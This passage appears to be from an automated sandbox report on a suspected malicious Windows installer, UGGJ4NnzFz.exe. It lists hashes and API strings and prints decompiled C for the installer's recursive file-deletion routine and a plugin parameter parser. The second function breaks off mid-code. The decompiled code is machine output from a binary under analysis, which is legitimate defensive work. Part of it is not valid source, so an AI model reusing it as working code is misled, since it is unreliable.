                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\UGGJ4NnzFz.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\UGGJ4NnzFz.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                • API String ID: 2278157092-1951128578
                                                                                                                • Opcode ID: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                                                • Instruction ID: d9df3101e86bd055252ea398e1a167ecdf9755d8b7b18b8fa076e16bcd865dbe
                                                                                                                • Opcode Fuzzy Hash: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                                                • Instruction Fuzzy Hash: E191D231A087417EE7216F609D49B2B7EACEB01306F44457BF941B61E2C77CAE058B6E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040548B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 250 40548b-4054a6 call 40573a 253 4054a8-4054ba DeleteFileA 250->253 254 4054bf-4054c9 250->254 255 405653-405656 253->255 256 4054cb-4054cd 254->256 257 4054dd-4054eb call 405b66 254->257 258 4054d3-4054d7 256->258 259 4055fe-405604 256->259 265 4054fa-4054fb call 4056a0 257->265 266 4054ed-4054f8 lstrcatA 257->266 258->257 258->259 259->255 262 405606-405609 259->262 263 405613-40561b call 405e61 262->263 264 40560b-405611 262->264 263->255 273 40561d-405632 call 405659 call 40581e RemoveDirectoryA 263->273 264->255 268 405500-405503 265->268 266->268 271 405505-40550c 268->271 272 40550e-405514 lstrcatA 268->272 271->272 274 405519-405537 lstrlenA FindFirstFileA 271->274 272->274 289 405634-405638 273->289 290 40564b-40564e call 404f04 273->290 276 4055f4-4055f8 274->276 277 40553d-405554 call 405684 274->277 276->259 279 4055fa 276->279 283 405556-40555a 277->283 284 40555f-405562 277->284 279->259 283->284 286 40555c 283->286 287 405564-405569 284->287 288 405575-405583 call 405b66 284->288 286->284 292 4055d3-4055e5 FindNextFileA 287->292 293 40556b-40556d 287->293 300 405585-40558d 288->300 301 40559a-4055a9 call 40581e DeleteFileA 288->301 289->264 295 40563a-405649 call 404f04 call 4058b4 289->295 290->255 292->277 298 4055eb-4055ee FindClose 292->298 293->288 296 40556f-405573 293->296 295->255 296->288 296->292 298->276 300->292 303 40558f-405598 call 40548b 300->303 309 4055cb-4055ce call 404f04 301->309 310 4055ab-4055af 301->310 303->292 309->292 312 4055b1-4055c1 call 404f04 call 4058b4 310->312 313 4055c3-4055c9 310->313 312->292 313->292
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E0040548B(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040573A(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B66(0x4214a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056A0(_t72);
					} else {
						lstrcatA(0x4214a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405684( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B66(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040581E(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404F04(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404F04(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004058B4();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040548B(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a8 - 0x5c;
					if( *0x4214a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E61(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405659(_t72);
							E0040581E(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404F04(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404F04(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004058B4();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                                                0x00405496
                                                                                                                0x0040549a
                                                                                                                0x004054a3
                                                                                                                0x004054a6
                                                                                                                0x004054a9
                                                                                                                0x004054b1
                                                                                                                0x004054b3
                                                                                                                0x004054b4
                                                                                                                0x00000000
                                                                                                                0x004054b4
                                                                                                                0x004054c3
                                                                                                                0x004054c3
                                                                                                                0x004054c6
                                                                                                                0x004054c9
                                                                                                                0x004054dd
                                                                                                                0x004054e4
                                                                                                                0x004054e9
                                                                                                                0x004054eb
                                                                                                                0x004054fb
                                                                                                                0x004054ed
                                                                                                                0x004054f3
                                                                                                                0x004054f3
                                                                                                                0x00405500
                                                                                                                0x00405503
                                                                                                                0x0040550e
                                                                                                                0x00405514
                                                                                                                0x00405519
                                                                                                                0x00405529
                                                                                                                0x0040552b
                                                                                                                0x00405531
                                                                                                                0x00405534
                                                                                                                0x00405537
                                                                                                                0x004055f4
                                                                                                                0x004055f4
                                                                                                                0x004055f8
                                                                                                                0x004055fa
                                                                                                                0x004055fa
                                                                                                                0x004055fa
                                                                                                                0x004055fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040553d
                                                                                                                0x0040553d
                                                                                                                0x00405546
                                                                                                                0x0040554c
                                                                                                                0x00405551
                                                                                                                0x00405554
                                                                                                                0x00405556
                                                                                                                0x0040555a
                                                                                                                0x0040555c
                                                                                                                0x0040555c
                                                                                                                0x0040555a
                                                                                                                0x0040555f
                                                                                                                0x00405562
                                                                                                                0x00405575
                                                                                                                0x00405577
                                                                                                                0x0040557c
                                                                                                                0x00405583
                                                                                                                0x0040559b
                                                                                                                0x004055a1
                                                                                                                0x004055a7
                                                                                                                0x004055a9
                                                                                                                0x004055ce
                                                                                                                0x004055ab
                                                                                                                0x004055ab
                                                                                                                0x004055af
                                                                                                                0x004055c3
                                                                                                                0x004055b1
                                                                                                                0x004055b4
                                                                                                                0x004055b9
                                                                                                                0x004055bb
                                                                                                                0x004055bc
                                                                                                                0x004055bc
                                                                                                                0x004055af
                                                                                                                0x00405585
                                                                                                                0x0040558b
                                                                                                                0x0040558d
                                                                                                                0x00405593
                                                                                                                0x00405593
                                                                                                                0x0040558d
                                                                                                                0x00000000
                                                                                                                0x00405583
                                                                                                                0x00405564
                                                                                                                0x00405567
                                                                                                                0x00405569
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040556b
                                                                                                                0x0040556d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040556f
                                                                                                                0x00405573
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004055d3
                                                                                                                0x004055dd
                                                                                                                0x004055e3
                                                                                                                0x004055e3
                                                                                                                0x004055ee
                                                                                                                0x00000000
                                                                                                                0x004055ee
                                                                                                                0x00405505
                                                                                                                0x0040550c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004054cb
                                                                                                                0x004054cb
                                                                                                                0x004054cd
                                                                                                                0x004055fe
                                                                                                                0x00405601
                                                                                                                0x00405604
                                                                                                                0x00405656
                                                                                                                0x00405656
                                                                                                                0x00405656
                                                                                                                0x00405606
                                                                                                                0x00405609
                                                                                                                0x00405614
                                                                                                                0x00405619
                                                                                                                0x0040561b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040561e
                                                                                                                0x00405624
                                                                                                                0x0040562a
                                                                                                                0x00405630
                                                                                                                0x00405632
                                                                                                                0x00000000
                                                                                                                0x0040564e
                                                                                                                0x00405634
                                                                                                                0x00405638
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040563d
                                                                                                                0x00405642
                                                                                                                0x00405643
                                                                                                                0x00000000
                                                                                                                0x00405644
                                                                                                                0x0040560b
                                                                                                                0x0040560b
                                                                                                                0x00000000
                                                                                                                0x0040560b
                                                                                                                0x004054d3
                                                                                                                0x004054d7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004054d7

                                                                                                                APIs
                                                                                                                • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,74B5F560), ref: 004054A9
                                                                                                                • lstrcatA.KERNEL32(004214A8,\*.*,004214A8,?,00000000,?,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,74B5F560), ref: 004054F3
                                                                                                                • lstrcatA.KERNEL32(?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,74B5F560), ref: 00405514
                                                                                                                • lstrlenA.KERNEL32(?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,74B5F560), ref: 0040551A
                                                                                                                • FindFirstFileA.KERNEL32(004214A8,?,?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,74B5F560), ref: 0040552B
                                                                                                                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004055DD
                                                                                                                • FindClose.KERNEL32(?), ref: 004055EE
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
                                                                                                                • "C:\Users\user\Desktop\UGGJ4NnzFz.exe" , xrefs: 00405495
                                                                                                                • \*.*, xrefs: 004054ED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                • String ID: "C:\Users\user\Desktop\UGGJ4NnzFz.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                • API String ID: 2035342205-1229547663
                                                                                                                • Opcode ID: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
                                                                                                                • Instruction ID: bc429f5d1e1b14784ce7e3564347ec6ed469848bfd5577fff983359c073685a4
                                                                                                                • Opcode Fuzzy Hash: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
                                                                                                                • Instruction Fuzzy Hash: 0351F331904A447ADB216B218C45BBF3B79CF42728F54847BF905711E2CB3C5A82DE6E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 73751A98, Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E73751A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E73751215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E73751215();
				_t320 = E7375123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E737512FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E73751534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x73752259) & 0x000000ff) * 4 +  &M737521CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E73751224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E73751215();
											 &_v12 = E73751A36( &_v12);
											__eax = E73751429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E73751A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E73751A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x7375305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E73751A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
									_v16 = _t282;
									goto L80;
								}
								__eflags = _t271 != 1;
								if(_t271 != 1) {
									goto L162;
								}
								__eflags = _t285 - 0x6e;
								if(__eflags > 0) {
									_t308 = _t285 - 0x72;
									__eflags = _t308;
									if(_t308 == 0) {
										_push(4);
										L74:
										_pop(_t273);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t329 + 0x810;
											 *_t96 =  *(_t329 + 0x810) &  !_t273;
											__eflags =  *_t96;
										} else {
											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
										}
										_v8 = 1;
										goto L57;
									}
									_t311 = _t308 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t311 != 0;
									if(_t311 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t314 = _t285 - 0x21;
								__eflags = _t314;
								if(_t314 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t315 = _t314 - 0x11;
								__eflags = _t315;
								if(_t315 == 0) {
									_t273 = 0x100;
									goto L75;
								}
								_t316 = _t315 - 0x31;
								__eflags = _t316;
								if(_t316 == 0) {
									_t273 = 1;
									goto L75;
								}
								__eflags = _t316 != 0;
								if(_t316 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t282;
								_v36 = _t282;
								goto L20;
							}
						}
						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
						if( *((char*)(_t320 - 1)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t282;
						if(_v32 == _t282) {
							goto L43;
						}
						goto L17;
					}
					_t276 = _t257 - 5;
					if(_t276 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t282;
							_v20 = _t282;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t282;
							goto L20;
						}
					}
					_t280 = _t276 - 1;
					if(_t280 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t282;
							_v20 = _t282;
							goto L20;
						}
					}
					if(_t280 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
